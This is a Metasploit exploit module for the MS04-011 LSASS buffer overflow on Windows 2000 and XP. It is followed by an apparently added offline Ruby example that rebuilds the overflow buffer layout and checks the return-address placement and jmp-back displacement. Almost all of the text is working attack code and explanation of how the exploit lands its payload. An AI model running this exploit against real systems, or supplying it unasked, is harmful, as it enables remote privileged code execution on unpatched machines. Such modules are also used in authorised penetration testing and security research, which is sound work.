##
# $Id: ms04_011_lsass.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  #
  # This module exploits a vulnerability in the LSASS service
  #

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the LSASS service. This
        vulnerability was originally found by eEye. When re-exploiting a Windows XP
        system, you will need to run this module twice. DCERPC request fragmentation
        can be performed by setting the 'FragSize' parameter.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 9669 $',
      'References'     =>
        [
          [ 'CVE', '2003-0533' ],
          [ 'OSVDB', '5248' ],
          [ 'BID', '10108' ],
          [ 'MSB', 'MS04-011' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'           => 1024,
          'BadChars'        => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Automatic
          [
            'Automatic Targetting',
            {
              'Rets' => [ ],
            },
          ],
          # Windows 2000
          [
            'Windows 2000 English',
            {
              'Rets' => [ 0x773242e0 ],
            },
          ],
          # Windows XP
          [
            'Windows XP English',
            {
              'Rets' => [ 0x7449bf1a ],
            },
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Apr 13 2004'))
  end

  def exploit
    connect()
    smb_login()

    # Bind to the LSARPC interface (DsRolerUpgradeDownlevelServer lives here)
    handle = dcerpc_handle('3919286a-b10c-11d0-9ba8-00c04fd92ef5', '0.0', 'ncacn_np', ['\lsarpc'])
    print_status("Binding to #{handle}...")
    dcerpc_bind(handle)
    print_status("Bound to #{handle}...")

    print_status('Getting OS information...')

    # Check the remote OS name and version
    os = smb_peer_os
    buff = ''

    case os
    # Windows 2000 requires that the string be unicode formatted
    # and give us a nice set of registers which point back to
    # the un-unicoded data. We simply return to a nop sled that
    # jumps over the return address, some trash, and into the
    # final payload. Easy as pie.
    when /Windows 5\.0/
      str = rand_text_alphanumeric(3500)
      str[2020, 4] = [targets[1]['Rets'][0]].pack('V')
      str[2104, payload.encoded.length ] = payload.encoded
      buff = NDR.UnicodeConformantVaryingString(str)

    # Windows XP is a bit different, we need to use an ascii
    # buffer and a jmp esp. The esp register points to an
    # eight byte segment at the end of our buffer in memory,
    # we make these bytes jump back to the beginning of the
    # buffer, giving us about 1936 bytes of space for a
    # payload.
    when /Windows 5\.1/
      str = rand_text_alphanumeric(7000) + "\x00\x00"
      str[0, payload.encoded.length ] = payload.encoded
      str[1964, 4] = [targets[2]['Rets'][0]].pack('V')
      str[1980, 5] = "\xe9\x3f\xf8\xff\xff" # jmp back to payload
      str[6998, 2] = "\x00\x00"
      buff = NDR.UnicodeConformantVaryingStringPreBuilt(str)

    # Unsupported target
    else
      print_status("No target is available for #{ os }")
      return
    end

    # Remaining DsRolerUpgradeDownlevelServer arguments: the overflowing
    # string first, then the other string/long parameters filled with junk
    stub =
      buff +
      NDR.long(rand(0xFFFFFF)) +
      NDR.UnicodeConformantVaryingString('') +
      NDR.UnicodeConformantVaryingString('') +
      NDR.UnicodeConformantVaryingString('') +
      NDR.UnicodeConformantVaryingString('') +
      NDR.long(rand(0xFFFFFF)) +
      NDR.UnicodeConformantVaryingString('') +
      NDR.long(rand(0xFFFFFF)) +
      NDR.UnicodeConformantVaryingString('') +
      NDR.long(rand(0xFFFFFF)) +
      NDR.UnicodeConformantVaryingString('') +
      rand_text(528) +
      rand_text(528) +
      NDR.long(rand(0xFFFFFF))

    print_status("Trying to exploit #{os}")

    begin
      # Opnum 9 is DsRolerUpgradeDownlevelServer
      response = dcerpc_call(9, stub)
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
      print_status('Server did not respond, but that should be ok...')
    rescue Rex::Proto::DCERPC::Exceptions::Fault
      case $!.fault
      when 0x1c010002
        print_status('Server appears to have been patched')
      else
        print_status("Unexpected DCERPC fault 0x%.8x" % $!.fault)
      end
    end

    # Perform any required client-side payload handling
    handler

  end

end
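The two target branches above depend on a detail the module leaves implicit: on Windows 2000 the buffer goes through `NDR.UnicodeConformantVaryingString`, which widens every byte to a 16-bit unit, so the return address placed at narrow offset 2020 lands at wire offset 12 + 2*2020 with zero bytes interleaved, whereas the XP branch uses the PreBuilt variant and its offsets are taken literally. The following is an added, stand-alone example that is not part of the Metasploit module or of the framework. `MiniNDR` is an assumed re-implementation modelled on the Rex NDR helpers (a 12-byte max/offset/actual header in 16-bit units, NUL terminator, 4-byte alignment), constant `'A'` filler stands in for `rand_text_alphanumeric`, and nothing is sent over the network; it only lets you verify the layout and the `jmp` displacement offline.

```ruby
# Added example, NOT part of the Metasploit module above.  MiniNDR is an
# ASSUMED re-implementation modelled on Rex::Proto::DCERPC::NDR; it builds
# bytes only and sends nothing.
module MiniNDR
  # NDR 'long': 32-bit little-endian unsigned integer.
  def self.long(n)
    [n].pack('V')
  end

  # Pad to the next 4-byte boundary (NDR alignment).
  def self.align(data)
    data + ("\x00".b * ((4 - (data.bytesize % 4)) % 4))
  end

  # Conformant-varying UTF-16LE string: max count, offset, actual count
  # (32-bit LE, counted in 16-bit units), then the widened body including
  # its NUL terminator, then alignment padding.  Each narrow byte becomes
  # one 16-bit unit, so narrow index i ends up at wire offset 12 + 2*i.
  def self.unicode_conformant_varying_string(str)
    wide = (str.b + "\x00".b).unpack('C*').pack('v*')
    units = wide.bytesize / 2
    align([units, 0, units].pack('VVV') + wide)
  end

  # Same header, but the caller supplies the body already laid out; an
  # odd-length body is NUL-padded so the unit count is whole.
  def self.unicode_conformant_varying_string_prebuilt(str)
    body = str.b
    body += "\x00".b if body.bytesize.odd?
    units = body.bytesize / 2
    [units, 0, units].pack('VVV') + body
  end
end

NDR_HEADER_LEN = 12

# Wire offset of narrow-string index +i+ after UTF-16 widening.
def widened_offset(i)
  NDR_HEADER_LEN + 2 * i
end

# Windows 2000 layout from the module: widened string, return address at
# narrow offset 2020, payload at 2104.  Constructed filler is constant 'A'.
def w2k_buffer(ret, payload, total = 3500, ret_off = 2020, payload_off = 2104)
  str = ('A' * total).b
  str[ret_off, 4] = [ret].pack('V')
  str[payload_off, payload.bytesize] = payload.b
  MiniNDR.unicode_conformant_varying_string(str)
end

# Windows XP layout from the module: raw (not widened) body, payload at 0,
# return address at 1964, 5-byte rel32 jmp at 1980, trailing NULs.
XP_JMP = "\xe9\x3f\xf8\xff\xff".b

def xp_buffer(ret, payload, total = 7000, ret_off = 1964, jmp_off = 1980)
  str = ('A' * total).b + "\x00\x00".b
  str[0, payload.bytesize] = payload.b
  str[ret_off, 4] = [ret].pack('V')
  str[jmp_off, 5] = XP_JMP
  str[total - 2, 2] = "\x00\x00".b
  MiniNDR.unicode_conformant_varying_string_prebuilt(str)
end

# Where an E9 rel32 jmp located at +at+ lands within the same buffer:
# next-instruction offset plus the signed 32-bit displacement.
def jmp_rel32_target(at, insn)
  disp = insn[1, 4].unpack1('l<')
  at + 5 + disp
end

if __FILE__ == $0
  buf = w2k_buffer(0x773242e0, "\xcc".b * 16)
  printf("w2k: %d bytes on the wire, ret at %d: %s\n", buf.bytesize,
         widened_offset(2020), buf[widened_offset(2020), 8].unpack1('H*'))
  printf("xp:  jmp at 1980 lands at narrow offset %d\n",
         jmp_rel32_target(1980, XP_JMP))
end
```

Two things fall out of running it: the 2000 return address is sent as `e0 00 42 00 32 00 77 00`, which is why the module's comment says the registers must point back at the un-unicoded copy rather than at the wire bytes, and the XP `jmp` at 1980 has displacement -1985, which lands exactly at offset 0 where the payload sits, matching the module's "jmp back to payload" comment.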